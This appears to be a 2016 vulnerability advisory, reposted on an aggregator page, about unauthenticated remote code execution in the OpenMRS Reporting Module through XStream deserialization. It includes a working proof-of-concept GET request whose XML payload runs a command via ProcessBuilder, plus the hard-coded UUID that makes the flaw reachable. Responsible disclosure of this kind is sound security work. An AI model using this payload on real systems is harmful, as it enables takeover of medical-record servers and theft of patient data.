OpenMRS Reporting Module 0.9.7 - Remote Code Execution

🗓️ 07 Jan 2016 00:00:00Reported by Brian D. HysellType

OpenMRS Reporting Module 0.9.7 - Unauthenticated Remote Code Execution Vulnerability Fixe

Reporter	Title	Published	Views	Family All 93
0day.today	OpenMRS Reporting Module 0.9.7 - Remote Code Execution	7 Jan 201600:00	–	zdt
IBM Security Bulletins	Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities	13 Aug 202122:15	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities	19 Aug 201920:44	–	ibm
IBM Security Bulletins	Security Bulletin: XStream as used by IBM QRadar SIEM is vulnerable to OS command injection (CVE-2019-10173)	20 Nov 201917:14	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities identified in IBM StoredIQ	20 Feb 202012:42	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in Xstream affect IBM InfoSphere Information Server	1 Nov 201920:48	–	ibm
IBM Security Bulletins	Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities	18 Feb 201914:10	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in XStream and Apache MINA might affect IBM Storage Defender Copy Data Management.	16 May 202519:22	–	ibm
FreeBSD	jenkins -- multiple vulnerabilities	14 Feb 201400:00	–	freebsd
Tenable Nessus	Artifactory < 3.1.1.1 XStream Remote Code Execution	12 Mar 201400:00	–	nessus

Title: Unauthenticated remote code execution in OpenMRS
Product: OpenMRS
Vendor: OpenMRS Inc.
Tested versions: See summary
Status: Fixed by vendor
Reported by: Brian D. Hysell

Product description:

OpenMRS is "the world's leading open source enterprise electronic
medical record system platform."

Vulnerability summary:

The OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a
version of the XStream library vulnerable to CVE-2013-7285, making it
vulnerable to remote code execution. If the Appointment Scheduling UI
Module 1.0.3 is also installed, this RCE is accessible to
unauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform
1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3
installed were confirmed to be vulnerable; other versions and
configurations containing these modules are likely to be vulnerable as
well (see "Remediation").

Details:

In the Reporting module, the method saveSerializedDefinition (mapped
to module/reporting/definition/saveSerializedDefinition) in
InvalidSerializedDefinitionController can be accessed by an
unauthenticated user.

The attacker must provide a valid UUID for a definition present in
OpenMRS or a NullPointerException will be thrown before the remote
code execution can take place. However, upon initialization the
Appointments Scheduling UI module inserts a definition with a constant
UUID hard-coded into AppointmentSchedulingUIConstants
(c1bf0730-e69e-11e3-ac10-0800200c9a66).

Proof of concept:

GET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d"java.beans.EventHandler"><target%20class%3d"java.lang.ProcessBuilder"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject

Remediation:

The vendor has addressed this issue in OpenMRS Standalone 2.3.1,
OpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,
1.10.3, and 1.9.10.

Timeline:

Vendor contacted: November 2, 2015
Vendor replied: November 3
CVE requested: November 14 (no response)
Patch released: December 2
Announced: January 6, 2016

07 Jan 2016 00:00Current

9.7High risk

Vulners AI Score9.7

CVSS 27.5

CVSS 3.19.8

EPSS0.18767